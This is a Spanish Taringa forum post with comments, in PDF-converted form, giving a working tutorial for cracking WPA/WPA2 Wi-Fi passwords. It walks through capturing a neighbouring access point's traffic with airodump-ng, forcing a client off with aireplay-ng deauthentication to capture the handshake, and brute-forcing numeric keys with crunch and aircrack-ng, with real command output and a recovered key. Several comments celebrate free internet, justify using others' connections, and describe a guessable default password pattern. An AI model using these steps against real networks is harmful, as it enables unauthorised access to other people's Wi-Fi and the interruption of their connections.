Embed Size (px)
Citation preview
Inicio Novatos Destacados
Romper WPA y WPA2 con crunchAnuncios GoogleNetwork Intelligencewww.vssmonitoring.com - Network Intelligence Optimization can be achieved with VSS Monitoring
Hace un tiempo me venían pidiendo armar un tutorial sobre cómo crackear redes con cifrados WPA y WPA2. Entonces decidí por realizar este tuto utilizando una herramienta que reemplaza a los diccionarios y en mi caso me dióbastante efectividad.
Empecemos por dejar en claro un par de cuestiones, la encriptación WEP como ya sabemos es fácil de romper, secapturan paquetes para luego por ingeniería inversa crackear esos paquetes y conseguir la clave. En el caso de WPA y WPA2 es distinto, el método anterior no puede ser utilizado. Estos tipos de cifrados utilizan algo llamado "handshake" (apretón de manos), es una especie de "saludo" entre el AP(Access Point) y el Cliente. Lo que debemos capturar en este caso justamente es ese handshake para estar en "confianza" con el AP e intentarmediante un diccionario o en este caso con otro método que utilizo yo, romper la clave.
Una vez aclarado el funcionamiento, largo el método:
Voy a utilizar un software llamado "crunch"
Vamos a bajarlo desde acá
dijo:DESCARGAR CRUNCH
Una vez que lo descargamos, lo descomprimimos:
dijo:tar -xvzf crunch*.tgz
Entramos al directorio
dijo:cd crunch
Lo compilamos, por las dudas primero dejo el build-essential por si no lo tienen:
dijo:
Con el botón social deTaringa! los usuarios podránrecomendar tu web muyfacilmente!
Nuevo botón de Taringa!
IdentificarmeIdentificarme Buscar...
Posts Comunidades TOPs Global
LINUX Y GNU | HACE MÁS DE 1AÑO
Twittear Twittear 02477Like
Moderador
1.902Seguidores
162.169Puntos
385Posts
Ver más del autor »
dysloke
SeguirSeguir
router Wifi wireless
ap cifrado Linux wpa
aircrack wpa2 crunch
tkip psk
Tags
Anuncios Google
Descrifrar Claves WiFi
Linux PowerPC
Wireless WPA
Compartido por
converted by Web2PDFConvert.com
apt-get install build-essential
Ahora si, lo compilamos:
dijo:make
dijo:make install
Por último copiamos el comando al sbin:
dijo:cp crunch /usr/sbin/
Voy a dar por sentado que tienen instalado aircrack-ng, pero como soy bueno, les dejo el apt-get por las dudas:
dijo:apt-get install aircrack-ng
Empezamos !!
Ponemos en modo promiscuo (monitor) nuestra placa (en mi caso la interfaz es aht1, cada cual ponga la suya):
dijo:airodump-ng ath1
Me aparecen un par de redes:
dijo:CH 6 ][ Elapsed: 4 s ][ 2010-07-11 23:44
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:1B:11 3:A9:5D 2 2 0 0 1 54 . WEP WEP dlink-007 00:14:BF:79:8B:3C 5 2 0 0 6 54 WPA2 CCMP PSK PORINGA 00:21:29:EB:57:85 2 0 0 0 6 54 OPN Nazario_w 00:21:29:96:85:0C 9 3 1 0 6 54e WEP WEP Martin 00:1A:70:3D:3D:81 3 2 0 0 6 54 OPN linksys 00:1C:10:2A:C7:99 5 3 0 0 6 54e OPN Nazario_w 00:18:E7:56:26:89 7 4 0 0 6 54 . WPA TKIP PSK default 00:26:5A:53:E5:84 4 4 0 0 6 54 WEP WEP AR-RED 00:1D:7E:22:25:22 -1 0 3 1 6 -1 OPN <length: 00:18:E7:61:A9:47 8 3 0 0 6 54 . WPA TKIP PSK ESTUDIO J 00:0A:E5:79:83:E8 1 4 1 0 11 11 WEP WEP CIBERA 00:21:29:72 C:32 5 3 0 0 11 54 . WEP WEP linksys 00:0F:A3 1:9C:5B 21 6 0 0 12 54 . WEP WEP LKSA 00:25:9C:69:97:B7 16 12 0 0 11 54e WPA2 TKIP PSK WIPS 00:0F:A3 1:67:8A 6 6 0 0 4 54 . WEP WEP Wi-Fi Arn 1C:AF 7:42:E1:E6 -1 0 0 0 9 -1 <length: 00:15:63:11:69:90 16 10 0 0 9 12e. WEP WEP <length: 00:25:9C:3B:69:28 23 15 0 0 6 54e WEP WEP Apicc 00:40:77:BB:55:03 21 19 0 0 6 54e WPA TKIP PSK dd-wrt 00:21:00:61:B9:12 1 2 0 0 1 54 OPN FT89769
converted by Web2PDFConvert.com
Juro que el ESSID PORINGA no es mío !!
Bueno, sigamos, la que voy a utilizar es "default" que tiene cifrado WPA TKIP PSK:
TKIP: (Temporal Key Integrity Protocol) PSK: (Pre-Shared Key)
Una vez que tenemos el MAC del AP y el canal, ponemos:
dijo:airodump-ng -c NUMERODELCANAL --bssid MAC-DEL-AP -w default ath1
En este caso:
dijo:airodump-ng -c 6 --bssid 00:18:E7:56:26:89 -w default ath1
Ahora airodump sólo va a escuchar ese canal y ese AP.:
dijo:CH 6 ][ Elapsed: 9 mins ][ 2010-07-11 23:53 ]
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:18:E7:56:26:89 9 90 4152 762 5 6 54 . WPA TKIP PSK defau
BSSID STATION PWR Rate Lost Packets Probes
00:18:E7:56:26:89 00:0C:41:7A:77:43 51 11 - 1 42 1102 00:18:E7:56:26:89 00:1F:E1:23:33:40 15 0 - 1 0 61 default
Acá tenemos dos posibles escenarios:
1) Esperar que se conecte un nuevo cliente para adquirir el handshake 2) Desautenticar un cliente ya conectado para que vuelva a conectarse y adquirir el handshake
En este caso vamos a utilizar la segunda opción, anotamos el MAC del AP y el MAC del cliente conectado.
AP: 00:18:E7:56:26:89 Cliente Conectado: 00:0C:41:7A:77:43
Procedemos a desautenticar al cliente mediante este comando:
dijo:aireplay-ng -0 10 -a MAC-DEL-AP -c MAC-DEL-CLIENTE ath1
En este caso:
dijo:aireplay-ng -0 10 -a 00:18:E7:56:26:89 -c 00:0C:41:7A:77:43 ath1
Hace algo así:
dijo:[root@debian dke]# aireplay-ng -0 10 -a 00:18:E7:56:26:89 -c 00:0C:41:7A:77:43 ath1 23:46:18 Waiting for beacon frame (BSSID: 00:18:E7:56:26:89) on channel 6 23:46:19 Sending 64 directed DeAuth. STMAC: [00:0C:41:7A:77:43] [ 1|173 ACKs] 23:46:20 Sending 64 directed DeAuth. STMAC: [00:0C:41:7A:77:43] [14|155 ACKs]
converted by Web2PDFConvert.com
23:46:20 Sending 64 directed DeAuth. STMAC: [00:0C:41:7A:77:43] [ 0|207 ACKs] 23:46:21 Sending 64 directed DeAuth. STMAC: [00:0C:41:7A:77:43] [11|173 ACKs] 23:46:21 Sending 64 directed DeAuth. STMAC: [00:0C:41:7A:77:43] [31|186 ACKs] 23:46:26 Sending 64 directed DeAuth. STMAC: [00:0C:41:7A:77:43] [ 0|240 ACKs] 23:46:27 Sending 64 directed DeAuth. STMAC: [00:0C:41:7A:77:43] [3 186 ACKs] 23:46:27 Sending 64 directed DeAuth. STMAC: [00:0C:41:7A:77:43] [ 0|137 ACKs] 23:46:28 Sending 64 directed DeAuth. STMAC: [00:0C:41:7A:77:43] [ 0|147 ACKs] 23:46:32 Sending 64 directed DeAuth. STMAC: [00:0C:41:7A:77:43] [19|258 ACKs]
Si no lo desautentifica a la primera, volver a repetir el comando.
Una vez que el usuario es desautenticado y vuelva a ingresar nos va a aparecer arriba a la derecha el handshake
dijo:CH 6 ][ Elapsed: 9 mins ][ 2010-07-11 23:53 ][ WPA handshake: 00:18:E7:56:26:89
Listo, ya tenemos nuestro handshake, ahora utilizamos el crunch:
Escribimos esto:
dijo:crunch 8 9 0123456789 | aircrack-ng -a 2 RUTA-DEL-ARCHIVO-CAP -e default -b HANDSHAKE -w -
En este caso:
dijo:crunch 8 9 0123456789 | aircrack-ng -a 2 /home/dke/defa*.cap -e default -b 00:18:E7:56:26:89 -w -
Aclaración: "crunch 8 9" hace referencia a que las claves WPA como mínimo tienen 8 caracteres, en este caso yoquiero que sólo pruebe hasta 9 caracteres, y que utilice los números 0123456789. El 75% de los usuarios cometen el error de "securizar" la red con WPA y usar claves numéricas, que en este casovamos a ver lo fáciles que son de conseguir con crunch Si quisiéramos que crunch use letras, pondríamos "crunch 8 15 (máximo 15 caracteres)" abcdefghijklmno"
Ahora vamos a ver como crunch empieza a generar claves y a probarlas con el aircrack-ng:
dijo:
[root@debian dke]# crunch 8 9 0123456789 | aircrack-ng -a 2 /home/dke/defa*.cap -e default -b00:18:E7:56:26:89 -w - Opening /home/dke/default-01.cap Reading packets, please wait...
Aircrack-ng 1.0 rc3
[00:00:50] 72172 keys tested (1445.33 k/s)
KEY FOUND! [ 00072169 ]
Master Key : F0 BE A1 08 A5 4C D6 E4 08 5C 5F B4 42 4A 69 F0 32 1D C9 11 D5 F3 BB 64 3D F2 31 AB FA F7 A7 1E
Transient Key : 72 42 D4 F0 91 91 E9 27 F8 8E D0 DF 1D 48 1B AD 16 10 78 D5 B1 7E 8D 9E 7A 76 68 AC 44 2A 37 94 30 4C 47 F5 FE EB 01 7E 8B 64 87 EF 78 3D 2F 1E E8 6B 4A 2E E4 95 F4 57 4A 32 05 54 66 AA D6 98
converted by Web2PDFConvert.com
Twittear Twittear
2
EAPOL HMAC : C8 28 B2 83 87 05 18 45 D8 26 C0 42 1D AB A0 7D
Listo, ya tenemos la clave
Un video que capturé para los despistados y por las caritas de mierda que aparecen..
link: http://www.youtube.com/watch?v=s8hR3By8v_E
Fuente: mi blog y yo
Anuncios Google
Report Management Software www.prophix.com/reporting - Powerful Management and Financial ReportingSoftware. Free Demo!
4
Me gusta
77
T! score: 8.5 / 10
354Puntos
SeguirSeguir Agregar a FavoritosAgregar a Favoritos 29SEGUIDORES
67.725VISITAS
508FAVORITOS
Comentarios destacados@dysloke hace más de 9 meses +11
mateitow001 dijo:mmm q post mas novato
no es para gente intelectual como vos que posteás "las cumbias de lady gaga"
converted by Web2PDFConvert.com
143 comentarios
1 2
@chequeterakata hace más de 1 año -81
No creo que se deban publicar estas cosas... es como robar
@maxpower001 hace más de 1 año +2
buena data a favoritos
@Serguti hace más de 1 año +4
Muy bueno! Bien explicado.
@dysloke hace más de 1 año +3
chequeterakata dijo:No creo que se deban publicar estas cosas... es como robar
No es esa la idea, la idea es que se tome conciencia.Si vos seteás una clave estilo: ok@83mXXiS77 es IMPOSIBLE que te la roben, pueden pasar 500 años y note la van a romper.O si usás Radius
@maxpower001 hace más de 1 año -4
dysloke dijo:
chequeterakata dijo:No creo que se deban publicar estas cosas... es como robar
No es esa la idea, la idea es que se tome conciencia.Si vos seteás una clave estilo: ok@83mXXiS77 es IMPOSIBLE que te la roben, pueden pasar 500años y no te la van a romper.O si usás Radius
a lo sumo que tengas un computadora de la nasa
@maxpower001 hace más de 1 año +1
00:14:BF:79:8B:3C 5 2 0 0 6 54 WPA2 CCMP PSK PORINGA
@fullvice hace más de 1 año
dysloke hackeroooouuuu !!! (?)
@maxpower001 hace más de 1 año -2
162331PUNTOSesto responde tu pregunta
fullvice dijo:dysloke hackeroooouuuu !!! (?)
@Ezelrengo hace más de 1 año +1
Encontré una razón para reinstalar mi kubuntu.
@maxpower001 hace más de 1 año +1
fullvice dijo:dysloke hackeroooouuuu !!! (?)
converted by Web2PDFConvert.com
162331PUNTOS esto responde tu pregunta
@berik hace más de 1 año
maxpower001 dijo:00:14:BF:79:8B:3C 5 2 0 0 6 54 WPA2 CCMP PSK PORINGA
@ajvajv hace más de 1 año -6
maxpower001 dijo:
fullvice dijo:dysloke hackeroooouuuu !!! (?)
162331PUNTOS esto responde tu pregunta
Y si lees 4 lineas arriba de eso... "Moderador"
Mas que hacker es un acomodado
@facundogato hace más de 1 año -3
ajvajv dijo:
maxpower001 dijo:
fullvice dijo:dysloke hackeroooouuuu !!! (?)
162331PUNTOS esto responde tu pregunta
Y si lees 4 lineas arriba de eso... "Moderador"
Mas que hacker es un acomodado
@dysloke hace más de 1 año +1
traten de enfocar los comentarios sobre el tema Ni hacker ni acomodado, posteo algo que quizá a muchos le sirva, a quienes no les sirve simplementeabstengan los comentarios offtopic
@recepcionista hace más de 1 año
los que tienen miedo de este post es porque ocultan las cosas o no saben poner una buena contraseña suwifi, internet debería ser libre para todos en fin, vos pagas yo la uso también asi es la consigna en estOSúltimos siglos ajajaja :buenspot:
@pampanero hace más de 1 año
Mirá... a mi me parece que esta un poco mal que alguien garpe un router wifi para facilitar las conexiones yvos utilizas su internet... cada uno es libre de elegir SU contraseña con SU router...
@ajvajv hace más de 1 año
dysloke dijo:traten de enfocar los comentarios sobre el tema Ni hacker ni acomodado, posteo algo que quizá a muchos le sirva, a quienes no les sirvesimplemente abstengan los comentarios offtopic
converted by Web2PDFConvert.com
Me parece que especialmente vos tendrias que saber lo que es Taringa, rara vez un post se mantiene dentrodel topic.
Ontopic: necesitas una placa tipo Atheros o con una Realtek chota alcanza?
@Cami_PR hace más de 1 año -1
nu entendi na' pero igual pase (?)
@Fhran hace más de 1 año
AMIGO COMO PUEDO HACER UN USB LIVE CON CRUNCH???
@Mousse hace más de 1 año
Te falta poner la placa en modo monitor primero.
@rastune hace más de 1 año
para windows mobile no hay?
@dysloke hace más de 1 año
Mousse dijo:Te falta poner la placa en modo monitor primero.
Me parece que no:
dijo:Empezamos !!
Ponemos en modo promiscuo (monitor) nuestra placa (en mi caso la interfaz es aht1, cada cualponga la suya):
@Lucain hace más de 1 año
ajvajv dijo:
dysloke dijo:traten de enfocar los comentarios sobre el tema Ni hacker ni acomodado, posteo algo que quizá a muchos le sirva, a quienes no les sirvesimplemente abstengan los comentarios offtopic
Me parece que especialmente vos tendrias que saber lo que es Taringa, rara vez un post se mantienedentro del topic.
Ontopic: necesitas una placa tipo Atheros o con una Realtek chota alcanza?
Creo que cualquier placa que soporte la suite aircrack-ng, el ataque sige siendo con esta suite, el descifrado(lo dificil en este caso) es con crunch con el volcado de datos que da el aircrack.
Interesante el crunch, lo voy a probar en casa
Pregunta, se pueden usar rangos? algo como:
crunch 8 64 [A..Z] [a..z] [0..9]
Para descifrar algo alfanumerico y con mayusculas?
@rafazed hace más de 1 año
converted by Web2PDFConvert.com
chequeterakata dijo:No creo que se deban publicar estas cosas... es como robar
Puede que sea robar... pero cuando hay emergencias, por ejemplo de tareas de la escuela y se te va eljodido internet es necesario esto, ya me ha salvado varias veces.
dysloke dijo:
Mousse dijo:Te falta poner la placa en modo monitor primero.
Me parece que no:
dijo:Empezamos !!
Ponemos en modo promiscuo (monitor) nuestra placa (en mi caso la interfaz es aht1, cadacual ponga la suya):
Con el primer comando creo que automaticamente se pone en modo monitor, pero tambien para ponerla enmodo monitor hay otro comando "sudo airmon-ng" y te muestra las interfaces que hay, entonces ponias"sudo airmon-ng interfaz start" y te la ponia en modo monitor.
Muy buen post! No sabia como crackear WPA! +10
@rafazed hace más de 1 año
me olvidaba, cambia el comando para cuando es WPA2?
@Fhran hace más de 1 año
por favor me dicen si se puede hacer un usb live con esto???
@cariatore hace más de 1 año
lo voy a probar ! gracias!
@rafazed hace más de 1 año
Fhran dijo:por favor me dicen si se puede hacer un usb live con esto???
creo que tendrias que meter a tu USB una distro como Ubuntu, pero con el paquete Crunch y Aircrack-ngpreviamente instalado, pero no se como hacer eso. Suerte!
@rafazed hace más de 1 año
rafazed dijo:
Fhran dijo:por favor me dicen si se puede hacer un usb live con esto???
creo que tendrias que meter a tu USB una distro como Ubuntu, pero con el paquete Crunch y Aircrack-ng previamente instalado, pero no se como hacer eso. Suerte!
Creo que lo encontre! Tal vez esto te sirva: http://phylevn.mexrom.net/index.php/blog/show/Crea-tu-propio-LiveCD-personalizado-con-remastersys.html
Con eso creas una ISO de tu instalación actual, nada mas faltaria meter esa ISO a una USB con unetbootin.
@leogol16 hace más de 1 año
converted by Web2PDFConvert.com
hola buen tuto pero mi consulta es a q llamas "RUTA-DEL-ARCHIVO-CAP" ??
saludos
@leogol16 hace más de 1 año
leogol16 dijo:hola buen tuto pero mi consulta es a q llamas "RUTA-DEL-ARCHIVO-CAP" ??
saludos
olvidate ya me di cuenta q es!!!! ejejej gracias!
@MHkoko88 hace más de 1 año
a favs....creo que tendras muchos MP
@juaz26 hace más de 1 año
chue hermano!!!manso problema tengo!!!descomprimo el archivo y . . . . . no se ve nada!!!
@dysloke hace más de 1 año
juaz26 dijo:chue hermano!!!manso problema tengo!!!descomprimo el archivo y . . . . . no se ve nada!!!
Fijate de estar logueado como root, si lo descomprimiste con tar -xvzf crunch*.tgz y no te tiró error algunotiene que aparecerte la carpeta si o si.
@juaz26 hace más de 1 año
dysloke dijo:
juaz26 dijo:chue hermano!!!manso problema tengo!!!descomprimo el archivo y . . . . . no se ve nada!!!
Fijate de estar logueado como root, si lo descomprimiste con tar -xvzf crunch*.tgz y no te tiró erroralguno tiene que aparecerte la carpeta si o si.
ya fue, lo hice con sudo nautilus y le di permisos!!!
@Fhran hace más de 1 año
pero yo no tengo ni idea de como puedo poner esto en funcionamiento
@__n4rf__ hace más de 1 año
che.. muy bueno! lo probe con mi propia conexion (dspues de borrar todo rastro de ella), tardo un rato, perola saco! un groso!Obvio, yo ya sabia el rango de caracteres en el que tenia que buscar, pero igual, de ultima le pongo todoslos numeros y todo el abecedario (en mayusc y minusc), cuanto taradara maximo con una contraseña de 8-12 caracteres.. mientras tarde menos de 30min es genial, de ultima lo dejas crackeando, te dormis unasiestita... y listouuuu
@dysloke hace más de 1 año
si es alfanumérico y con mayúsculas, de 12 caracteres, puede tardar AÑOS (sin exagerar)La idea del crunch es casi exclusivo a probar que las contraseñas sean numéricas
@narosky hace más de 1 año
Guau, muy interesante! a favoritos gracias!
converted by Web2PDFConvert.com
@Umask hace más de 1 año
Veremos que utilidad le damos, por lo pronto se agradece y a favoritos
@yuyo hace más de 1 año
5.
@PunXtaR hace más de 1 año
__n4rf__ dijo:che.. muy bueno! lo probe con mi propia conexion (dspues de borrar todo rastro de ella), tardoun rato, pero la saco! un groso!Obvio, yo ya sabia el rango de caracteres en el que tenia que buscar, pero igual, de ultima lepongo todos los numeros y todo el abecedario (en mayusc y minusc), cuanto taradara maximocon una contraseña de 8-12 caracteres.. mientras tarde menos de 30min es genial, de ultima lodejas crackeando, te dormis una siestita... y listouuuu
a veces pueden ser miles de siestas xD
@javiiersss hace más de 1 año
dijo:CH 6 ][ Elapsed: 4 s ][ 2010-07-11 23:44 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTHESSID 00:1B:113:A9:5D 2 2 0 0 1 54 . WEP WEP dlink-007 00:14:BF:79:8B:3C 5 2 0 0 6 54 WPA2CCMP PSK PORINGA 00:21:29:EB:57:85 2 0 0 0 6 54 OPN Nazario_w 00:21:29:96:85:0C 9 3 1 0 654e WEP WEP Martin 00:1A:70:3D:3D:81 3 2 0 0 6 54 OPN linksys 00:1C:10:2A:C7:99 5 3 0 0 6 54eOPN Nazario_w 00:18:E7:56:26:89 7 4 0 0 6 54 . WPA TKIP PSK default 00:26:5A:53:E5:84 4 4 0 0 654 WEP WEP AR-RED 00:1D:7E:22:25:22 -1 0 3 1 6 -1 OPN <length: 00:18:E7:61:A9:47 8 3 0 0 6 54 .WPA TKIP PSK ESTUDIO J 00:0A:E5:79:83:E8 1 4 1 0 11 11 WEP WEP CIBERA 00:21:29:72C:32 5 30 0 11 54 . WEP WEP linksys 00:0F:A31:9C:5B 21 6 0 0 12 54 . WEP WEP LKSA 00:25:9C:69:97:B716 12 0 0 11 54e WPA2 TKIP PSK WIPS 00:0F:A31:67:8A 6 6 0 0 4 54 . WEP WEP Wi-Fi Arn1C:AF7:42:E1:E6 -1 0 0 0 9 -1 <length: 00:15:63:11:69:90 16 10 0 0 9 12e. WEP WEP <length:00:25:9C:3B:69:28 23 15 0 0 6 54e WEP WEP Apicc 00:40:77:BB:55:03 21 19 0 0 6 54e WPA TKIPPSK dd-wrt 00:21:00:61:B9:12 1 2 0 0 1 54 OPN FT89769
( )
@xxHidanxx hace más de 1 año +5
dijo:Romper WPA y WPA2 con crunch
o sea que cuando los rompes hacen "crunch, crunch"?
@sab007 hace más de 1 año -3
xxHidanxx dijo:
dijo:Romper WPA y WPA2 con crunch
o sea que cuando los rompes hacen "crunch, crunch"?
@xxHidanxx hace más de 1 año
sab007 dijo:
xxHidanxx dijo:
dijo:Romper WPA y WPA2 con crunch
o sea que cuando los rompes hacen "crunch, crunch"?
converted by Web2PDFConvert.com
u.u
@mavabe hace más de 1 año
Que es la RUTA-ARCHIVO-Cap?.Es una ruta de un archivo existente?. Si es asi donde y cuando se creo?
@dysloke hace más de 1 año
mavabe dijo:Que es la RUTA-ARCHIVO-Cap?. Es una ruta de un archivo existente?. Si es asi donde y cuandose creo?
Es el archivo .cap que guarda cuando obtenés el handshake.El "-w" justamente es el parámetro que guarda la información, si no guardás un .cap no podés luego usaraircrack y te lo guarda donde estés situado en ese momento.
@daledondale hace más de 1 año
hola dysloke..hace rato puedo con las weps, y hace un tiempo empece a leer para romper wpa y wpa2.Use el crunch y la verdad no me funciono..en cambio, con el aircrack solo y luego diccionario, rompi unawpa2. Igual gracias por el aporte, es solo mi experiencia personal, capaz a muchos les funciono. saludos
@factorial hace más de 1 año
es una joda no? el wpa 2 solo se puede crackear con placas de video...
@factorial hace más de 1 año
[00:00:50] 72172 keys tested (1445.33 k/s)
o sea si pongo una contraseña alfanumerica con mayusculas y minusculas de 10 caracteres voy a tardar9228 millones de años !!!!! ese numero de 1445 claves por segundo seguro es con un I7 ... con la mejor placade video del mundo solo se puede probar mas o menos 90000 claves por segundo.. un poco mas rapido xD
@dysloke hace más de 1 año
emmm factorial, si .. es una joda, el video en realidad está "trucado".Y no sé de donde sacaste que sólo puede crackearse con el gpu, poné 5 máquinas virtuales en clúster y vasa ver si se puede más rápido o no .. pero igualmente no da discutir cuando el mensaje es mala leche.Suerte!
@factorial hace más de 1 año
no es mala leche. la tecnica esta buena por poder elegir los numeros y letras que quieras para crackear,pero es impractico por la velocidad. hay gente que pone contraseñas jodidas no "123456789". seria bueno enserio si se pudiera crackear a 2 millones de claves por segundo, ahi tiene otra pinta
@6ustav hace más de 1 año
creo que alguien porahi pregunto lo mismo que yo y quedo en el aire la pregunta....
para wpa2 es el mismo metodo o cambia en algo ?
@dysloke hace más de 1 año
factorial, te vuelvo a repetir, porque quizá vos leiste en algún lado que wpa2 sólo puede crackearse con GPU,bueno .. estás equivocado.Probá armar un clúster con 5 máquinas virtuales corriendo crunch al mismo tiempo y fijate qué velocidadlevantás
6ustav, es exactamente el mismo método.
@factorial hace más de 1 año
pido perdon mi intencion no era armar bardo.
por otro lado, cluster con varias maquinas virtuales que este a mi alcance economico, muy lejos. la mejorplaca de video que existe tal vez ahorrando un par de meses me la compro xD. no digo que las placas devideo sean la unica manera de crackear la encriptacion wpa, pero es la mejor costo / beneficio. por algo el
converted by Web2PDFConvert.com
mejor cracker de redes wifi hacia eso.. por algo lo hacia no?
@dysloke hace más de 1 año
pronto voy a terminar un proyecto que estamos armando con clústers y te voy a mostrar la velocidad quepuede levantar, creeme que te vas a cagar de risa del "mejor cracker de redes wifi"
@6ustav hace más de 1 año
acabo de poder crackear mi primer wep ! ja.. (dsp de casi 2 años recien crean una compatibilidad para mitarjeta en backtrack...... ahora voy a intentar con tu tuto a ver q sale
@cariatore hace más de 1 año
Hola Capo! Sabes que tengo un problema cuando hago: aireplay-ng -0 10 ... me salta sobre el canal 1, pordefecto hay forma de cambiar esto! no se q hago mal!! Gracias
@dysloke hace más de 1 año
airmon-ng stop mon0 (o como se llame) && airmon-ng stop wlan0 (o wifi0, o como se llame)Luego:
ifconfig wlan0 (o wifi0, o como sea) channel NUMERO-DE-CANAL-QUE-QUIERAS-CRACKEAR
levantás, ifconfig wlan0 (wifi0, o como sea) up
y cuando levantas con airmon-ng wlan0 (wifi0 o como sea) también le hacés un ifconfig mon0 (o la interfaceque te levante) channel CANAL-QUE-VAS-A-USAR
Espero hayas entendido
@6ustav hace más de 1 año
Dysloke tal vez me puedas dar una mano .... Segui los pasos del post y consegui handshake, pero concrunch no pude conseguir pass porque me dice que no se encuentra entre 0123456789 y abcdefghijklmno.Ahora, yo lo que quiero hacer es probar con aircrack y fuerza bruta.. se q es mas dificil de conseguir de estaforma pero quiero intentarlo.. El problema que tengo es que estoy desde una live cd y el diccionario lo tengoen el escritorio de w7 , como podria hacer para apuntar desde dentro de backtrack corriendo desde live a laruta C:\Users\Gustavo\Desktop ? espero q se haya entendido lo q quise decir
@dysloke hace más de 1 año
usa un pendrive o montá la unidad con ntfs-3g (mount -t ntfs-3g /dev/TUPARTICION /mnt/carpeta (antes haceun mkdir /mnt/carpeta) y listo.
@6ustav hace más de 1 año
Miles de gracias ! pude solucionarlo
@jinny hace más de 1 año
Gracias dysloke voy a probar con mi switch innalambrico. Estoy aprendiendo seguridad informatica, quierodedicarme a esto Saludos!!
@mojado hace más de 1 año
a favs.Y por fin el martes me llega éste bichito que pedí en dealextreme hace mas de un mes. http://www.dealextreme.com/details.dx/sku.44929
ahora, yo handshake es igual a inyeccion no? bah, creo que la finalidad es la misma, la de inyectarpaquetes, I guest....
@natilucha hace más de 1 año
probé con el crunch que viene en el backtrack 4 y no hubo caso...
@mojado hace más de 1 año
a mi me es imposible conseguir mi propio handshake, comprobando la simple seguridad de mi red.Con WPA2 lo mismo, le tiro con aireplay varios ataques y nunca consigo el hand.
@DeviLPowerr hace más de 1 año -1
converted by Web2PDFConvert.com
chequeterakata dijo:No creo que se deban publicar estas cosas... es como robar
Entonces tampoco publiques juegos, programas, ni nada similar Ok?
@Uapts hace más de 11 meses
chequeterakata dijo:No creo que se deban publicar estas cosas... es como robar
tecnicamente roba el que lo implementa, no el que lo postea. Igual entiendo el conflicto etico. Creo quetaringa seria un enorme sitio vacio si fueramos eticos... Peliculas, software, hacks, Cracks, imagenes.... Nopagamos derechos por nada. Me parece que no da para salir a señalar. Creo que si alguno de los users detaringa tiene un conflicto etico con lo que se postea lo que deberia hacer es dejar de entrar en Taringa. Escomo entrar en una xxx y decir: el sexo es pecado! Esto es vergonzoso! mmm... Somos lo que hacemos.
@Lailo hace más de 11 meses
jajajaj PORINGA se llama la red de casa!!! en realidad es poringa con minuscula!!!
@Felip0n hace más de 11 meses
¿Y como nos protegemos de estos ataques?
@dysloke hace más de 11 meses
Felip0n dijo:¿Y como nos protegemos de estos ataques?
Usá claves alfanuméricas con más de 12 caracteres.
@Felip0n hace más de 11 meses
dysloke dijo:
Felip0n dijo:¿Y como nos protegemos de estos ataques?
Usá claves alfanuméricas con más de 12 caracteres.
Ponele que la red PORINGA desactive el broadcast de ssid, ¿seguira saliendo en el scaneo del airdump?
@dysloke hace más de 11 meses
hay métodos para visualizar redes que esconden el ssid..
@marianoskaa hace más de 11 meses
Hasta ahora usaba Commview For WiFi en Win7.. Ya que no puedo poner la tarjeta en monitor desde elterminal en Ubuntu Lucid Lynx.. pero esto tiene buena pinta.. van a valer la pena unos intentos
@lokylh hace más de 11 meses
Se puede con la placa de una netbook?
@dysloke hace más de 11 meses
lokylh siempre y cuando la placa inyecte no hay problema.Yo tengo una netbook (acer one) que trae una Atheros y la uso justamente para todo lo que tenga que vercon wifi, desde inyectar hasta wardriving
@Nenita_Yeh hace más de 11 meses +3
yo aqui en chile soy MUY MUYafortunada todas, pero TODAS las claves de wifi caseras tienen la misma combinacion de clave:
converted by Web2PDFConvert.com
cifrado: wepssid: nombre del propietarioclave: cbc + numero de casa
ejemplo:
cifrado: wepssid: carlaclave: cbc8449610
''y te lo muestro'':
INTERNET GRATIS!!!
@ulizesmx hace más de 11 meses -1
hahahha prefiero la vieja tecnica de AirCrack!! son muchas lineas con ese
@dysloke hace más de 11 meses
ulizesmx dijo:hahahha prefiero la vieja tecnica de AirCrack!! son muchas lineas con ese
converted by Web2PDFConvert.com
ni siquiera leiste el post me parece, porque justamente la técnica es con aircrack-ng + crunch ..
@elrodrix hace más de 11 meses
es dificil romper una clave wpa che =/
@Vidaure hace más de 11 meses
exelente post ahi +10
@mulder2003 hace más de 11 meses
Sos un fackin grosso, +10, a favs, sigo el post y te mando a mi hermana.
@Snake_14 hace más de 10 meses
Excelente - ya me estaba aburriendo de buscar los p.u.t.o.s diccionarios que pesan 4 GB y mas encima noson capases de romper la clave WPA/2 , gracias a FAV. y por supuesto +10
@natilucha hace más de 10 meses
con el crunch que trae el backtrack 4 se puede?
@DurrutiBuenaventura hace más de 10 meses
Felip0n dijo:¿Y como nos protegemos de estos ataques?
Hacé como yo, tengo una contraseña wpa2 de 63 caracteres, filtrado de mac y el ssid oculto... y escaneo lared seguido para controlar.
@DurrutiBuenaventura hace más de 10 meses
DurrutiBuenaventura dijo:
Felip0n dijo:¿Y como nos protegemos de estos ataques?
Hacé como yo, tengo una contraseña wpa2 de 63 caracteres, filtrado de mac y el ssid oculto... yescaneo la red seguido para controlar.
Y a eso le podés agregar que la red no asigne ip por dhcp, o sea utilizar ip's fijas, y que sólo haya salida ainternet a través de un proxy.
@dysloke hace más de 10 meses
bue, pero qué tenés, información confidencial de Bin Laden ?Me parece exageradísimo una clave de 63 caracteres, con 12 - 15 caracteres con minúsculas, mayúsculas,números y caracteres especiales es imposible de romperse.Y de qué te sirve el filtrado de mac y el ssid oculto ? de nada .. Podrían ponerse tu MAC, y el ssid oculto está comprobadísimo que con herramientas como kismet.
@MaaURo14BS18 hace más de 10 meses
dysloke dijo:bue, pero qué tenés, información confidencial de Bin Laden ?Me parece exageradísimo una clave de 63 caracteres, con 12 - 15 caracteres con minúsculas,mayúsculas, números y caracteres especiales es imposible de romperse.Y de qué te sirve el filtrado de mac y el ssid oculto ? de nada .. Podrían ponerse tu MAC, y el ssid oculto está comprobadísimo que con herramientas comokismet.
dysloke!!
@shinex64 hace más de 10 meses
No debes postear las direcciones MAC!!!!!!
@taringueroFC hace más de 10 meses -1
converted by Web2PDFConvert.com
Te gustaria q te robaran el wifi.
@Snake_14 hace más de 10 meses
hola , tengo una pregunta , cuanto tiempo demoraria desifrar una red con clave WPA de 10 caracteres , perosolo numericos con crunch ???
@fgranda hace más de 9 meses -1
